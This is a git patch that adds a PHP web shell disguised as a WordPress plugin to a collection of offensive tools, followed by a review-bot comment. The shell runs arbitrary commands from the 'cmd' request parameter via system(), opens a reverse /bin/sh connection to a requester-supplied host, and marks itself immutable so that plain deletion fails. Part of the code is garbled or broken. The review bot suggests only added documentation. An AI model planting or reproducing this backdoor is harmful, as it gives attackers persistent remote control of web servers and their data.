From ec75402c12317864b22fd139e5a67ea847d4e974 Mon Sep 17 00:00:00 2001
From: Dejan Zelic
Date: Mon, 2 Dec 2019 14:49:17 -0700
Subject: [PATCH] Added wordpress plugin shell by leonjza
---
 Web-Shells/WordPress/plugin-shell.php | 82 +++++++++++++++++++++++++++
 1 file changed, 82 insertions(+)
 create mode 100755 Web-Shells/WordPress/plugin-shell.php
diff --git a/Web-Shells/WordPress/plugin-shell.php b/Web-Shells/WordPress/plugin-shell.php
new file mode 100755
index 00000000..bac69fc9
--- /dev/null
+++ b/Web-Shells/WordPress/plugin-shell.php
@@ -0,0 +1,82 @@
+uid=33(www-data) gid=verd33(www-data) groups=33(www-data)
+ Author: Leon Jacobs
+ Version: 0.3
+ Author URI: https://leonjza.github.io
+ */
+
+# attempt to protect myself from deletion
+$this_file = __FILE__;
+@system("chmod ugo-w $this_file");
+@system("chattr +i $this_file");
+
+# Name of the parameter (GET or POST) for the command. Change this if the target already use this parameter.
+$cmd = 'cmd';
+
+# test if parameter 'cmd', 'ip or 'port' is present. If not this will avoid an error on logs or on all pages if badly configured.
+if(isset($_REQUEST[$cmd])) {
+
+ # grab the command we want to run from the 'cmd' GET or POST parameter (POST don't display the command on apache logs)
+ $command = $_REQUEST[$cmd];
+ executeCommand($command);
+
+} else if(isset($_REQUEST[$ip]) && !isset($_REQUEST[$cmd])) {
+
+ $ip = $_REQUEST[$ip];
+
+ # default port 443
+ $port = '443';
+
+ if(isset($_REQUEST[$ip])){
+ $port = $_REQUEST[$port];
+ }
+
+ # nc -nlvp 443
+ $sock = fsockopen($ip,$port);
+ $command = '/bin/sh -i <&3 >&3 2>&3';
+
+ executeCommand($command);
+
+}
+
+die();
+
+function executeCommand(string $command) {
+
+ # Try to find a way to run our command using various PHP internals
+ if (class_exists('ReflectionFunction')) {
+
+ # http://php.net/manual/en/class.reflectionfunction.php
+ $function = new ReflectionFunction('system');
+ $function->invoke($command);
+
+ } elseif (function_exists('call_user_func_array')) {
+
+ # http://php.net/manual/en/function.call-user-func-array.php
+ call_user_func_array('system', array($command));
+
+ } elseif (function_exists('call_user_func')) {
+
+ # http://php.net/manual/en/function.call-user-func.php
+ call_user_func('system', $command);
+
+ } else if(function_exists('passthru')) {
+
+ # https://www.php.net/manual/en/function.passthru.php
+ ob_start();
+ passthru($command , $return_var);
+ $output = ob_get_contents();
+ ob_end_clean();
+
+ } else if(function_exists('system')){
+
+ # this is the last resort. chances are PHP Suhosin
+ # has system() on a blacklist anyways :>
+
+ # http://php.net/manual/en/function.system.php
+ system($command);
+ }
+}
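Review bot: The self-protection block at the top of the new file (`@system("chmod ugo-w $this_file")` and `@system("chattr +i $this_file")`) changes the file's write permission and immutable flag silently, and nothing in the header tells whoever has to clean up afterwards that this happened. Because both calls are `@`-suppressed, there is also no indication of whether they took effect, so the file can be left behind on an assessed host in a state that a plain delete will not remove. I would document this next to the block, for example `# NOTE: this file marks itself read-only and, where chattr succeeds, immutable; removal needs chattr -i and chmod u+w first`. The header should also state that the `cmd` request parameter reaches `system()` through `executeCommand()` with no access check, since that is the exposure the host carries for as long as the file stays deployed.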